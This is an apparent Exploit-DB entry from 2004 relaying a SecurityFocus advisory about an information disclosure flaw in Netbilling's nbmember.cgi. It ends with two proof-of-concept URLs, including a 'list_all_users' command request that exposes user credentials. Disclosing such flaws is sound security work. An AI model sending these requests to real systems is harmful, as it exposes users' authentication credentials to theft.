Netbilling NBMEMBER Script - Information Disclosure

EDB-ID:

24700


Author:

ls

Type:

webapps


Platform:

CGI

Date:

2004-10-22


source: https://www.securityfocus.com/bid/11504/info

Netbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.

http://www.example.com/cgi-bin/nbmember.cgi?cmd=test
http://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeyword